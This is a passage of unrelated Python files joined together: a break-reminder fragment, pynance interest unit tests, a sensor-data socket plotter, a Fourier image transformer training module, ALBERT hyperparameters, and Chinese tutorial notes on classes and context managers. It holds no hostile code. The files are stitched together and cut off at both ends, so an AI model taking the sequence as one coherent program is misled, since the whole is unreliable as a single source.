'done' to stop the remainder") musicloop('eye.mp3' , 'done') init_eye= time() detailkeeper("Eye Relaxed") elif time() - init_exercise > exercise_duration: print("\n\nExercise Time Dude.\nEnter 'done' to stop the remainder") musicloop('exercise.mp3' , 'done') init_exercise= time() detailkeeper("Exercised") """ Unit tests for `interest` module Copyright (c) 2014, 2015 <NAME> license http://opensource.org/licenses/MIT """ import sys import unittest import pynance as pn class TestInterest(unittest.TestCase): def test_yrlygrowth(self): # growth of 8 over 3 years means annual growth of 2 self.assertAlmostEqual(pn.interest.yrlygrowth(8, 3), 2.0) def test_yrlyret(self): # interest of 2.0 over .5 yrs means growth of 3.0 # so annual muliple of 9.0 and interest of 8.0 self.assertAlmostEqual(pn.interest.yrlyret(2, 0.5), 8.0) def test_compgrowth(self): # compound an annual growth of 16.0 over 0.5 yrs self.assertAlmostEqual(pn.interest.compgrowth(16.0, 0.5), 4.0) def test_compret(self): # compound annual interest of 0.1 over 25 years self.assertAlmostEqual(pn.interest.compret(0.1, 25), 9.83, places=2) def test_pvannuity(self): # 15% return for 5 years self.assertAlmostEqual(pn.interest.pvannuity(0.15, 5), 3.352, places=3) # 10 payments of 10k at 18% self.assertAlmostEqual(pn.interest.pvannuity(.18, 10, 10000.), 44941., places=0) def test_loanpayment(self): # 15% interest with 5 yrly payments for a loan of 1000 self.assertAlmostEqual(pn.interest.loanpayment(1000., 0.15, 5), 298.32, places=2) def test_growthfromrange(self): # 15% return from 2014-01-12 to 2015-06-30 self.assertAlmostEqual(pn.interest.growthfromrange(1.15, '2014-01-12', '2015-06-30'), 1.100314) def test_retfromrange(self): # 15% return from 1999-12-01 to 2000-03-15 self.assertAlmostEqual(pn.interest.retfromrange(.15, '1999-12-01', '2000-03-15'), .626079, places=6) def test_growthtocont(self): # 10% annual return self.assertAlmostEqual(pn.interest.growthtocont(1.1), .0953102) def test_conttogrowth(self): # 10% continuous self.assertAlmostEqual(pn.interest.conttogrowth(.1), 1.1051709) if __name__ == '__main__': unittest.main() __author__ = 'zhengwang' import csv import socket import time import math import matplotlib.pyplot as plt import matplotlib.patches as patches from matplotlib.patches import Ellipse, Circle class SensorStreamingTest(object): def __init__(self): self.server_socket = socket.socket() self.server_socket.bind(('192.168.1.123', 8002)) #computer's ip self.server_socket.listen(0) self.connection, self.client_address = self.server_socket.accept() self.streaming() def streaming(self): try: print "Connection from: ", self.client_address start = time.time() plt.ion() fig = plt.figure() while True: sensor_data = self.connection.recv(1024).split(',') # print sensor_data test = sensor_data[2].split('.')[0] sensor_data[2] = test print "Distance1: %0.1f cm; Distance2: %0.1f cm; Distance3: %0.1f cm" % (float(sensor_data[0]),float(sensor_data[1]),float(sensor_data[2])) print "time %0.2f s" % float(time.time()-start) #for i in range(len(list)): # for i in range(350,400): # print list[i], i # sensor_data = list[i] x1,x2,x3,x6,x7,x8 = [],[],[],[],[],[] y1,y2,y3,y4,y5,y6,y7,y8,y9,y10,y11 = [],[],[],[],[],[],[],[],[],[],[] if float(sensor_data[0]) < 30.7: x1.append(-7.5-float(sensor_data[0])*math.sqrt(2)/2)#red point y1.append(12.5+float(sensor_data[0])*math.sqrt(2)/2) x6.append(-7.5-float(sensor_data[0])*math.sqrt(2)/2)#red line y6.append(12.5+float(sensor_data[0])*math.sqrt(2)/2) elif float(sensor_data[0]) < 53: x2.append(-7.5-float(sensor_data[0])*math.sqrt(2)/2)#blue point y2.append(12.5+float(sensor_data[0])*math.sqrt(2)/2) y9.append(12.5+float(sensor_data[0])*math.sqrt(2)/2)#green line else: # x2.append(-7.5-100*math.sqrt(2)/2) # y2.append(12.5+100*math.sqrt(2)/2) y3.append(99)#green line if float(sensor_data[2]) < 30.7: x1.append(7.5+float(sensor_data[2])*math.sqrt(2)/2)#red point y1.append(12.5+float(sensor_data[2])*math.sqrt(2)/2) x7.append(7.5+float(sensor_data[2])*math.sqrt(2)/2)#red line y7.append(12.5+float(sensor_data[2])*math.sqrt(2)/2) elif float(sensor_data[2]) < 53: x2.append(7.5+float(sensor_data[2])*math.sqrt(2)/2)#blue point y2.append(12.5+float(sensor_data[2])*math.sqrt(2)/2) y10.append(12.5+float(sensor_data[2])*math.sqrt(2)/2)#green line else: # x2.append(-7.5+100*math.sqrt(2)/2) # y2.append(12.5+100*math.sqrt(2)/2) y4.append(99)#green line if float(sensor_data[1]) < 32.5: x1.append(0)#red point y1.append(12.5+float(sensor_data[1])) y8.append(12.5+float(sensor_data[1]))#red line elif float(sensor_data[1]) < 100: x2.append(0)#blue point y2.append(12.5+float(sensor_data[1])) y11.append(12.5+float(sensor_data[1]))#green line else: x2.append(0) y2.append(99) y5.append(99) ax = fig.add_subplot(111,facecolor='black') cir1 = Circle(xy = (0.0, 0.0), radius=45, alpha=0.3, color='white') ax.add_patch(patches.Rectangle((-7.5, -12.5), 15, 25)) ax.add_patch(cir1) plt.plot([-15,-15,-15],[-100,0,100],color = 'white', lw = 3) plt.plot([15,15,15],[-100,0,100],color = 'white', lw = 3) plt.plot([45,45,45],[-100,0,100],color = 'white', lw = 3) plt.plot([-45,-45,-45],[-100,0,100],color = 'white', lw = 3) if len(y3) > 0: plt.plot([-45,-30,-15],[y3[0],y3[0],y3[0]],color = '#ADFF2F', lw = 3) if len(y4) > 0: plt.plot([15,30,45],[y4[0],y4[0],y4[0]],color = '#ADFF2F', lw = 3) if len(y5) > 0: plt.plot([-15,0,15],[y5[0],y5[0],y5[0]],color = '#ADFF2F', lw = 3) if len(y6) > 0: plt.plot([-40,-30,-20],[y6[0],y6[0],y6[0]],color = 'red', lw = 3) if len(y7) > 0: plt.plot([20,30,40],[y7[0],y7[0],y7[0]],color = 'red', lw = 3) if len(y8) > 0: plt.plot([-10,0,10],[y8[0],y8[0],y8[0]],color = 'red', lw = 3) if len(y9) > 0: plt.plot([-45,-30,-15],[y9[0],y9[0],y9[0]],color = '#ADFF2F', lw = 3) if len(y10) > 0: plt.plot([15,30,45],[y10[0],y10[0],y10[0]],color = '#ADFF2F', lw = 3) if len(y11) > 0: plt.plot([-15,0,15],[y11[0],y11[0],y11[0]],color = '#ADFF2F', lw = 3) plt.axis('scaled') #plt.axis('equal') plt.axis([-75,75,-100,100]) plt.axis([-75,75,-100,100]) plt.scatter(x1,y1,marker='x',color='red') plt.scatter(x2,y2) # filename = "%d.png" %i # plt.savefig(filename) plt.draw() plt.pause(0.01) plt.clf() # testing for 30 seconds # if time.time() - start > 300: # csvfile.close() # break finally: self.connection.close() self.server_socket.close() if __name__ == '__main__': SensorStreamingTest()<reponame>rayanirban/FourierImageTransformer import torch from pytorch_lightning import LightningModule from torch.optim.lr_scheduler import ReduceLROnPlateau from fit.modules.loss import _fc_prod_loss, _fc_sum_loss from fit.transformers.TRecTransformer import TRecTransformer, TRecOnlyFBP, TRecOnlyConvBlock from fit.utils import PSNR, convert2DFT, psf_rfft from fit.utils.RAdam import RAdam import numpy as np from torch.nn import functional as F import torch.fft from fit.utils.utils import denormalize, denormalize_amp, denormalize_phi, denormalize_FC class TRecTransformerModule(LightningModule): def __init__(self, d_model, sinogram_coords, target_coords, src_flatten_coords, dst_flatten_coords, dst_order, angles, img_shape=27, detector_len=27, loss='prod', use_fbp=True, init_bin_factor=4, bin_factor_cd=10, lr=0.0001, weight_decay=0.01, attention_type="linear", n_layers=4, n_heads=4, d_query=4, dropout=0.1, attention_dropout=0.1, only_FBP=False, only_convblock=False, d_conv=8): super().__init__() self.save_hyperparameters("d_model", "img_shape", "bin_factor_cd", "init_bin_factor", "detector_len", "loss", "use_fbp", "lr", "weight_decay", "attention_type", "n_layers", "n_heads", "d_query", "dropout", "attention_dropout", "only_FBP", "only_convblock", "d_conv") self.sinogram_coords = sinogram_coords self.target_coords = target_coords if not type(src_flatten_coords) is torch.Tensor: self.src_flatten_coords = torch.from_numpy(src_flatten_coords) else: self.src_flatten_coords = src_flatten_coords if not type(dst_flatten_coords) is torch.Tensor: self.dst_flatten_order = torch.from_numpy(dst_flatten_coords) else: self.dst_flatten_order = dst_flatten_coords self.dst_order = dst_order self.angles = angles self.num_angles = len(self.angles) self.dft_shape = (img_shape, img_shape // 2 + 1) self.bin_factor = init_bin_factor self.bin_count = 0 self.best_mean_val_mse = 9999999 self.bin_factor_patience = 10 self.register_buffer('mask', psf_rfft(self.bin_factor, pixel_res=img_shape)) if loss == 'prod': self.loss = _fc_prod_loss else: self.loss = _fc_sum_loss if not self.hparams.use_fbp: self.register_buffer('zero_cond', torch.zeros(1, self.dst_flatten_order.shape[0], 2, dtype=torch.float32)) else: self.zero_cond = None if only_convblock: self.trec = TRecOnlyConvBlock(d_conv=d_conv) elif only_FBP: self.trec = TRecOnlyFBP(d_model=self.hparams.d_model, coords_target=self.target_coords, flatten_order_target=self.dst_flatten_order, attention_type=self.hparams.attention_type, n_layers=self.hparams.n_layers, n_heads=self.hparams.n_heads, d_query=self.hparams.d_query, dropout=self.hparams.dropout, attention_dropout=self.hparams.attention_dropout, d_conv=d_conv) else: self.trec = TRecTransformer(d_model=self.hparams.d_model, coords_sinogram=self.sinogram_coords, flatten_order_sinogram=self.src_flatten_coords, coords_target=self.target_coords, flatten_order_target=self.dst_flatten_order, attention_type=self.hparams.attention_type, n_layers=self.hparams.n_layers, n_heads=self.hparams.n_heads, d_query=self.hparams.d_query, dropout=self.hparams.dropout, attention_dropout=self.hparams.attention_dropout, d_conv=d_conv) x, y = torch.meshgrid(torch.arange(-self.hparams.img_shape // 2 + 1, self.hparams.img_shape // 2 + 1), torch.arange(-self.hparams.img_shape // 2 + 1, self.hparams.img_shape // 2 + 1)) self.register_buffer('circle', torch.sqrt(x ** 2. + y ** 2.) <= self.hparams.img_shape // 2) def forward(self, x, out_pos_emb): return self.trec.forward(x, out_pos_emb) def configure_optimizers(self): optimizer = RAdam(self.trec.parameters(), lr=self.hparams.lr, weight_decay=self.hparams.weight_decay) scheduler = ReduceLROnPlateau(optimizer, mode='min', factor=0.5, verbose=True) return { 'optimizer': optimizer, 'lr_scheduler': scheduler, 'monitor': 'Train/avg_val_mse' } def _real_loss(self, pred_img, target_fc, amp_min, amp_max): dft_target = convert2DFT(x=target_fc, amp_min=amp_min, amp_max=amp_max, dst_flatten_order=self.dst_flatten_order, img_shape=self.hparams.img_shape) if self.bin_factor > 1: dft_target *= self.mask y_target = torch.roll(torch.fft.irfftn(dft_target, dim=[1, 2], s=2 * (self.hparams.img_shape,)), 2 * (self.hparams.img_shape // 2,), (1, 2)) return F.mse_loss(pred_img, y_target) def _fc_loss(self, pred_fc, target_fc, amp_min, amp_max): pred_amp = denormalize_amp(pred_fc[..., 0], amp_min=amp_min, amp_max=amp_max) target_amp = denormalize_amp(target_fc[..., 0], amp_min=amp_min, amp_max=amp_max) pred_phi = denormalize_phi(pred_fc[..., 1]) target_phi = denormalize_phi(target_fc[..., 1]) amp_loss = 0 + torch.pow(pred_amp - target_amp, 2) phi_loss = 1 - torch.cos(pred_phi - target_phi) return torch.mean(amp_loss + phi_loss), torch.mean(amp_loss), torch.mean(phi_loss) def criterion(self, pred_fc, pred_img, target_fc, amp_min, amp_max): if self.hparams.only_convblock: return self._real_loss(pred_img=pred_img, target_fc=target_fc, amp_min=amp_min, amp_max=amp_max), torch.tensor(0.0), torch.tensor(0.0) else: fc_loss, amp_loss, phi_loss = self.loss(pred_fc=pred_fc, target_fc=target_fc, amp_min=amp_min, amp_max=amp_max) real_loss = self._real_loss(pred_img=pred_img, target_fc=target_fc, amp_min=amp_min, amp_max=amp_max) return fc_loss + real_loss, amp_loss, phi_loss def _bin_data(self, x_fc, fbp_fc, y_fc): shells = (self.hparams.detector_len // 2 + 1) / self.bin_factor num_sino_fcs = np.clip(self.num_angles * int(shells + 1), 1, x_fc.shape[1]) if self.bin_factor > 1: num_target_fcs = np.sum(self.dst_order <= shells) else: num_target_fcs = fbp_fc.shape[1] x_fc_ = x_fc[:, self.src_flatten_coords][:, :num_sino_fcs] if self.hparams.use_fbp: fbp_fc_ = fbp_fc[:, self.dst_flatten_order][:, :num_target_fcs] else: fbp_fc_ = self.zero_cond[:, self.dst_flatten_order][:, :num_target_fcs] fbp_fc_ = torch.repeat_interleave(fbp_fc_, x_fc.shape[0], dim=0) y_fc_ = y_fc[:, self.dst_flatten_order][:, :num_target_fcs] return x_fc_, fbp_fc_, y_fc_ def training_step(self, batch, batch_idx): x_fc, fbp_fc, y_fc, y_real, (amp_min, amp_max) = batch x_fc_, fbp_fc_, y_fc_ = self._bin_data(x_fc, fbp_fc, y_fc) pred_fc, pred_img = self.trec.forward(x_fc_, fbp_fc_, amp_min=amp_min, amp_max=amp_max, dst_flatten_coords=self.dst_flatten_order, img_shape=self.hparams.img_shape, attenuation=self.mask) fc_loss, amp_loss, phi_loss = self.criterion(pred_fc, pred_img, y_fc_, amp_min, amp_max) return {'loss': fc_loss, 'amp_loss': amp_loss, 'phi_loss': phi_loss} def training_epoch_end(self, outputs): loss = [d['loss'] for d in outputs] amp_loss = [d['amp_loss'] for d in outputs] phi_loss = [d['phi_loss'] for d in outputs] self.log('Train/loss', torch.mean(torch.stack(loss)), logger=True, on_epoch=True) self.log('Train/amp_loss', torch.mean(torch.stack(amp_loss)), logger=True, on_epoch=True) self.log('Train/phi_loss', torch.mean(torch.stack(phi_loss)), logger=True, on_epoch=True) def _gt_bin_mse(self, y_fc, y_real, amp_min, amp_max): dft_y = convert2DFT(x=y_fc, amp_min=amp_min, amp_max=amp_max, dst_flatten_order=self.dst_flatten_order, img_shape=self.hparams.img_shape) y_hat = torch.roll(torch.fft.irfftn(dft_y, dim=[1, 2], s=2 * (self.hparams.img_shape,)), 2 * (self.hparams.img_shape // 2,), (1, 2)) return F.mse_loss(y_hat, y_real) def _val_psnr(self, pred_img, y_real): pred_img_norm = denormalize(pred_img, self.trainer.datamodule.mean, self.trainer.datamodule.std) y_real_norm = denormalize(y_real, self.trainer.datamodule.mean, self.trainer.datamodule.std) psnrs = [] for i in range(len(pred_img_norm)): gt = self.circle * y_real_norm[i] psnrs.append(PSNR(gt, self.circle * pred_img_norm[i], drange=gt.max() - gt.min())) return torch.mean(torch.stack(psnrs)) def validation_step(self, batch, batch_idx): x_fc, fbp_fc, y_fc, y_real, (amp_min, amp_max) = batch x_fc_, fbp_fc_, y_fc_ = self._bin_data(x_fc, fbp_fc, y_fc) pred_fc, pred_img = self.trec.forward(x_fc_, fbp_fc_, amp_min=amp_min, amp_max=amp_max, dst_flatten_coords=self.dst_flatten_order, img_shape=self.hparams.img_shape, attenuation=self.mask) val_loss, amp_loss, phi_loss = self.criterion(pred_fc, pred_img, y_fc_, amp_min, amp_max) val_mse = F.mse_loss(pred_img, y_real) val_psnr = self._val_psnr(pred_img, y_real) bin_mse = self._gt_bin_mse(y_fc_, y_real, amp_min=amp_min, amp_max=amp_max) self.log_dict({'val_loss': val_loss}) self.log_dict({'val_mse': val_mse}) self.log_dict({'val_psnr': val_psnr}) self.log_dict({'bin_mse': bin_mse}) if batch_idx == 0: self.log_val_images(pred_img, fbp_fc[:, self.dst_flatten_order], y_fc_, y_real, amp_min, amp_max) return {'val_loss': val_loss, 'val_mse': val_mse, 'val_psnr': val_psnr, 'bin_mse': bin_mse, 'amp_loss': amp_loss, 'phi_loss': phi_loss} def log_val_images(self, pred_img, fbp_fc, y_fc, y_real, amp_min, amp_max): dft_fbp = convert2DFT(x=fbp_fc, amp_min=amp_min, amp_max=amp_max, dst_flatten_order=self.dst_flatten_order, img_shape=self.hparams.img_shape) dft_target = convert2DFT(x=y_fc, amp_min=amp_min, amp_max=amp_max, dst_flatten_order=self.dst_flatten_order, img_shape=self.hparams.img_shape) for i in range(min(3, len(pred_img))): if self.bin_factor == 1: fbp_img = torch.roll(torch.fft.irfftn(self.mask * dft_fbp[i], s=2 * (self.hparams.img_shape,)), 2 * (self.hparams.img_shape // 2,), (0, 1)) y_img = y_real[i] else: fbp_img = torch.roll(torch.fft.irfftn(self.mask * dft_fbp[i], s=2 * (self.hparams.img_shape,)), 2 * (self.hparams.img_shape // 2,), (0, 1)) y_img = torch.roll(torch.fft.irfftn(self.mask * dft_target[i], s=2 * (self.hparams.img_shape,)), 2 * (self.hparams.img_shape // 2,), (0, 1)) fbp_img = torch.clamp((fbp_img - fbp_img.min()) / (fbp_img.max() - fbp_img.min()), 0, 1) pred_img_ = pred_img[i] pred_img_ = torch.clamp((pred_img_ - pred_img_.min()) / (pred_img_.max() - pred_img_.min()), 0, 1) y_img = torch.clamp((y_img - y_img.min()) / (y_img.max() - y_img.min()), 0, 1) self.trainer.logger.experiment.add_image('inputs/img_{}'.format(i), fbp_img.unsqueeze(0), global_step=self.trainer.global_step) self.trainer.logger.experiment.add_image('predcitions/img_{}'.format(i), pred_img_.unsqueeze(0), global_step=self.trainer.global_step) self.trainer.logger.experiment.add_image('targets/img_{}'.format(i), y_img.unsqueeze(0), global_step=self.trainer.global_step) def _is_better(self, mean_val_mse): return mean_val_mse < self.best_mean_val_mse * (1. - 0.0001) def validation_epoch_end(self, outputs): val_loss = [o['val_loss'] for o in outputs] val_mse = [o['val_mse'] for o in outputs] val_psnr = [o['val_psnr'] for o in outputs] bin_mse = [o['bin_mse'] for o in outputs] amp_loss = [d['amp_loss'] for d in outputs] phi_loss = [d['phi_loss'] for d in outputs] mean_val_mse = torch.mean(torch.stack(val_mse)) mean_val_psnr = torch.mean(torch.stack(val_psnr)) bin_factor_threshold = torch.mean(torch.stack(bin_mse)) * self.bin_factor if self._is_better(mean_val_mse): self.best_mean_val_mse = mean_val_mse self.bin_factor_patience = 10 else: self.bin_factor_patience -= 1 reduce_bin_factor = (self.bin_factor_patience < 1) or ( self.bin_count > self.hparams.bin_factor_cd and mean_val_mse < bin_factor_threshold) if reduce_bin_factor and self.bin_factor > 1: self.bin_count = 0 self.bin_factor_patience = 10 self.best_mean_val_mse = mean_val_mse self.bin_factor = max(1, self.bin_factor // 2) self.register_buffer('mask', psf_rfft(self.bin_factor, pixel_res=self.hparams.img_shape).to(self.device)) print('Reduced bin_factor to {}.'.format(self.bin_factor)) if self.bin_factor > 1: self.trainer.lr_schedulers[0]['scheduler']._reset() self.bin_count += 1 if self.bin_factor > 1: self.trainer.lr_schedulers[0]['scheduler']._reset() self.log('Train/avg_val_loss', torch.mean(torch.stack(val_loss)), logger=True, on_epoch=True) self.log('Train/avg_val_mse', mean_val_mse, logger=True, on_epoch=True) self.log('Train/avg_val_psnr', mean_val_psnr, logger=True, on_epoch=True) self.log('Train/avg_bin_mse', bin_factor_threshold, logger=True, on_epoch=True) self.log('Train/avg_val_amp_loss', torch.mean(torch.stack(amp_loss)), logger=True, on_epoch=True) self.log('Train/avg_val_phi_loss', torch.mean(torch.stack(phi_loss)), logger=True, on_epoch=True) def test_step(self, batch, batch_idx): x_fc, fbp_fc, y, y_real, (amp_min, amp_max) = batch assert len(x_fc) == 1, 'Test images have to be evaluated independently.' if self.bin_factor != 1: print('bin_factor set to 1.') self.bin_factor = 1 x_fc_, fbp_fc_, y_fc_ = self._bin_data(x_fc, fbp_fc, y) _, pred_img = self.trec.forward(x_fc_, fbp_fc_, amp_min=amp_min, amp_max=amp_max, dst_flatten_coords=self.dst_flatten_order, img_shape=self.hparams.img_shape, attenuation=self.mask) gt = denormalize(y_real[0], self.trainer.datamodule.mean, self.trainer.datamodule.std) pred_img = denormalize(pred_img[0], self.trainer.datamodule.mean, self.trainer.datamodule.std) gt = self.circle * gt return PSNR(gt, self.circle * pred_img, drange=gt.max() - gt.min()) def test_epoch_end(self, outputs): outputs = torch.stack(outputs) print(torch.mean(outputs).detach().cpu().numpy()) self.log('Mean PSNR', torch.mean(outputs), logger=True) self.log('SEM PSNR', torch.std(outputs / np.sqrt(len(outputs))), logger=True) def get_imgs(self, x, fbp, y, amp_min, amp_max): self.eval() self.bin_factor = 1 self.register_buffer('mask', psf_rfft(self.bin_factor, pixel_res=self.hparams.img_shape).to(self.device)) x_fc_, fbp_fc_, y_fc_ = self._bin_data(x, fbp, y) pred_fc, pred_img = self.trec.forward(x_fc_, fbp_fc_, amp_min=amp_min, amp_max=amp_max, dst_flatten_coords=self.dst_flatten_order, img_shape=self.hparams.img_shape, attenuation=self.mask) tmp = denormalize_FC(pred_fc, amp_min=amp_min, amp_max=amp_max) pred_fc_ = torch.ones(x.shape[0], self.hparams.img_shape * (self.hparams.img_shape // 2 + 1), dtype=x.dtype, device=x.device) pred_fc_[:, :tmp.shape[1]] = tmp dft_pred_fc = convert2DFT(x=pred_fc, amp_min=amp_min, amp_max=amp_max, dst_flatten_order=self.dst_flatten_order, img_shape=self.hparams.img_shape) img_pred_before_conv = torch.roll(torch.fft.irfftn(dft_pred_fc, dim=[1, 2], s=2 * (self.hparams.img_shape,)), 2 * (self.hparams.img_shape // 2,), (1, 2)) return pred_img, img_pred_before_conv <filename>hps.py from types import SimpleNamespace _common = { 'seed': 123, # not implemented 'nb_workers': 8, 'seq_len': 512, 'chunk_size': 1024, } _pretrain = { 'save_frequency': 5_000, 'test_size': 0.1, 'batch_size': 1024, 'mini_batch_size': 8, # be a multiple of 8 'learning_rate': 1e-4, 'mask_prob': .15, 'nb_updates': 125_000, 'nb_train_batches': 32, 'nb_eval_batches': 4, } _albert_shared = { 'embedding_dim': 128, 'nb_heads': 8, 'head_dim': 64, 'layer_norm': True, 'attention_type': 'nystrom', } _albert_base = { 'mlp_dim': 768, 'nb_layers': 6, 'dropout': 0.1, } _albert_large = { 'mlp_dim': 1024, 'nb_layers': 24, 'dropout': 0.1, } _albert_xlarge = { 'mlp_dim': 2048, 'nb_layers': 24, 'dropout': 0.0, } HPS = { ('pretrain', 'base'): SimpleNamespace(**(_common | _pretrain | _albert_shared | _albert_base)), ('pretrain', 'large'): SimpleNamespace(**(_common | _pretrain | _albert_shared | _albert_large)), ('pretrain', 'xlarge'): SimpleNamespace(**(_common | _pretrain | _albert_shared | _albert_xlarge)), } <reponame>HuangHuaBingZiGe/GitHub-Demo #!/usr/bin/python # -*- coding: utf-8 -*- """ 50个话题 9章 1.课程简介 2.数据结构相关话题 3.迭代器与生成器相关话题 4.字符串处理相关话题 5.文件I/O操作相关话题 6.数据编码与处理相关话题 7.类与对象相关话题 8.多线程与多进程相关话题 9.装饰器相关话题 """ """ 第1章 课程简介 1-1 课程简介 1-2 在线编码工具WebIDE使用指南 第2章 数据结构与算法进阶训练 2-1 如何在列表, 字典, 集合中根据条件筛选数据 2-2 如何为元组中的每个元素命名, 提高程序可读性 2-3 如何统计序列中元素的出现频度 2-4 如何根据字典中值的大小, 对字典中的项排序 2-5 如何快速找到多个字典中的公共键(key) 2-6 如何让字典保持有序 2-7 如何实现用户的历史记录功能(最多n条) 第3章 对象迭代与反迭代技巧训练 3-1 如何实现可迭代对象和迭代器对象(1) 3-2 如何实现可迭代对象和迭代器对象(2) 3-3 如何使用生成器函数实现可迭代对象 3-4 如何进行反向迭代以及如何实现反向迭代 3-5 如何对迭代器做切片操作 3-6 如何在一个for语句中迭代多个可迭代对象 第4章 字符串处理技巧训练 4-1 如何拆分含有多种分隔符的字符串 4-2 如何判断字符串a是否以字符串b开头或结尾 4-3 如何调整字符串中文本的格式 4-4 如何将多个小字符串拼接成一个大的字符串 4-5 如何对字符串进行左, 右, 居中对齐 4-6 如何去掉字符串中不需要的字符 第5章 文件I/O高效处理技巧训练 5-1 如何读写文本文件 5-2 如何处理二进制文件 5-3 如何设置文件的缓冲 5-4 如何将文件映射到内存 5-5 如何访问文件的状态 5-6 如何使用临时文件 第6章 csv,json,xml,excel高效解析与构建技巧训练 6-1 如何读写csv数据 6-2 如何读写json数据 6-3 如何解析简单的xml文档 6-4 如何构建xml文档 6-5 如何读写excel文件 第7章 类与对象深度技术进阶训练 7-1 如何派生内置不可变类型并修改实例化行为 7-2 如何为创建大量实例节省内存 7-3 如何让对象支持上下文管理 7-4 如何创建可管理的对象属性 7-5 如何让类支持比较操作 7-6 如何使用描述符对实例属性做类型检查 7-7 如何在环状数据结构中管理内存 7-8 如何通过实例方法名字的字符串调用方法 第8章 多线程编程核心技术应用进阶训练 8-1 如何使用多线程 8-2 如何线程间通信 8-3 如何在线程间进行事件通知 8-4 如何使用线程本地数据 8-5 如何使用线程池 8-6 如何使用多进程 第9章 装饰器使用技巧进阶训练 9-1 如何使用函数装饰器 9-2 如何为被装饰的函数保存元数据 9-3 如何定义带参数的装饰器 9-4 如何实现属性可修改的函数装饰器 9-5 如何在类中定义装饰器 """ """ 7-1 如何派生内置不可变类型并修改实例化行为 实际案例: 我们想自定义一种新类型的元组,对于传入的可迭代对象,我们只保留作其中int类型且大于0的元素,例如: IntTuple([1,-1,'abc',6,['x','y'],3])=>(1,6,3) 要求IntTuple是内置tuple的子类,如何实现? 解决方案: 定义类IntTuple继承内置tuple,并实现__new__,修改实例化行为 """ """ class IntTuple(tuple): # new先于init方法创建执行 def __new__(cls,iterable): g = (x for x in iterable if isinstance(x,int) and x > 0) print(g) return super(IntTuple,cls).__new__(cls,g) # 创建构造器 def __init__(self,iterable): # before print(self) #super(IntTuple,self).__init__(iterable) # after t = IntTuple([1,-1,'abc',6,['x','y'],3]) print(t) """ """ 7-2 如何为创建大量实例节省内存 实际案例: 某网络游戏中,定义了玩家类Player(id,name,status,...)每有一个在线玩家,在服务器程序内则有一个Player的实例,当在线人数很多时,将产生大量实例(如百万级) 如何降低这些大量实例的内存开销? 解决方案: 定义类的__slots__属性,它是用来声明实例属性名字的列表 """ """ class Player(object): def __init__(self,uid,name,status=0,level=1): self.uid = uid self.name = name self.status = status self.level = level class Player2(object): __slots__ = ['uid','name','status','level'] def __init__(self,uid,name,status=0,level=1): self.uid = uid self.name = name self.status = status self.level = level p1 = Player('0001','Jim') p2 = Player2('0001','Jim') print(dir(p1)) print(dir(p2)) print(set(dir(p1))) print(set(dir(p2))) print(set(dir(p1)) - set(dir(p2))) print(p1.__dict__) p1.x = 123 print(p1.x) print(p1.__dict__) p1.__dict__['y'] = 99 print(p1.y) print(p1.__dict__) # __dict__ 占用内存 del p1.__dict__['x'] # print(p1.x) print(sys.getsizeof(p1.__dict__)) # 这个字典占用了320个字节 # 关闭动态属性绑定,提前声明 __slots__ 有哪些空间保存哪些属性,阻止属性绑定 """ """ 7-3 如何让对象支持上下文管理 with open('demo.txt','w') as f: f.write('abcdef') f.writelines(['wyz\n','123\n']) # f.close() 实际案例: 我们实现了一个telnet客户端的类TelnetClient,调用实例的start()方法启动客户端与服务器交互,交互完毕后需要调用cleanup()方法,关闭已连接的socket,以及将操作历史记录写入文件并关闭 能否让TelnetClient的实例支持上下文管理协议,从而替代手工调用cleanup()方法 解决方案: 实现上下文管理协议,需定义实现的__enter__,__exit__方法,它们分别在with开始和结束时被调用 """ """ from telnetlib import Telnet from sys import stdin,stdout from collections import deque class TelnetClient(object): def __init__(self,addr,port=23): self.addr = addr self.port = port self.tn = None def start(self): self.tn = Telnet(self.addr,self.port) self.history = deque() # user t = self.tn.read_until('login: ') stdout.write(t) user = stdin.readline() self.tn.write(user) # password t = self.tn.read_until('Password: ') if t.startswith(user[:-1]):t = t[len(user) + 1:] stdout.write(t) self.tn.write(stdin.readline()) t = self.tn.read_until('$ ') stdout.write(t) while True: uinput = stdin.readline() if not uinput: break self.history.append(uinput) self.tn.write(uinput) t = self.tn.read_until('$ ') stdout.write(t[len(uinput) + 1:]) def cleanup(self): self.tn.close() self.tn = None with open(self.addr + '_history.txt','w') as f: f.writelines(self.history) client = TelnetClient('192.168.179.128') print('\nstart...') client.start() print('\ncleanup') """ """ from telnetlib import Telnet from sys import stdin, stdout from collections import deque class TelnetClient(object): def __init__(self, addr, port=23): self.addr = addr self.port = port self.tn = None def start(self): raise Exception('Test') # user t = self.tn.read_until('login: ') stdout.write(t) user = stdin.readline() self.tn.write(user) # password t = self.tn.read_until('Password: ') if t.startswith(user[:-1]): t = t[len(user) + 1:] stdout.write(t) self.tn.write(stdin.readline()) t = self.tn.read_until('$ ') stdout.write(t) while True: uinput = stdin.readline() if not uinput: break self.history.append(uinput) self.tn.write(uinput) t = self.tn.read_until('$ ') stdout.write(t[len(uinput) + 1:]) def cleanup(self): pass def __enter__(self): self.tn = Telnet(self.addr,self.port) self.history = deque() return self def __exit__(self, exc_type, exc_val, exc_tb): print('In __exit__') self.tn.close() self.tn = None with open(self.addr + '_history.txt', 'w') as f: f.writelines(self.history) return True # 对这个对象使用with方法,会进入enter方法,enter需要返回值 with TelnetClient('127.0.0.1') as client: client.start() print('End') """ """ 7-4 如何创建可管理的对象属性 实际案例: 在面向对象编程中,我们把方法(函数)看作对象的接口,直接访问对象的属性可能是不安全的,或设计上不够灵活,但是使用调用方法在形式上不如访问属性简洁 circle.getRadius() circle.setRadius(5.0) #繁 circle.radius circle.radius = 5.0 #简 能否在形式上是属性访问,但实际上调用方法? 解决方案: 使用property函数为类创建可管理属性,fget/fset/fdel对应相应属性访问 """ """ from math import pi class Circle(object): def __init__(self,radius): self.radius = radius def getRadius(self): return round(self.radius,2) def setRadius(self,value): if not isinstance(value,(int,float)): raise ValueError('wrong type') self.radius = float(value) def getArea(self): return self.radius ** 2 * pi R = property(getRadius,setRadius) # 调用方法,比较灵活,只需要改方法返回值或者某些参数 c = Circle(3.2) #c.getRadius() print(c.R) c.R = 5.9 print(c.R) # 类型错误,无法识别 # c.radius = 'abc' # d = c.radius * 2 # print(d) """ """ 7-5 如何让类支持比较操作 实际案例: 有时我们希望自定义的类,实例间可以使用<,<=,>,>=,==,!=符号进行比较,我们自定义比较的行为,例如,有一个矩形的类,我们希望比较两个矩形的实例时,比较的是他们的面积 解决方案: 比较符号运算符重载,需要实现一下方法: __lt__,__le__,__gt__,__ge__,__eq__,__ne__ 使用标准库下的functools下的类装饰器total_ordering可以简化此过程 """ """ from functools import total_ordering from abc import 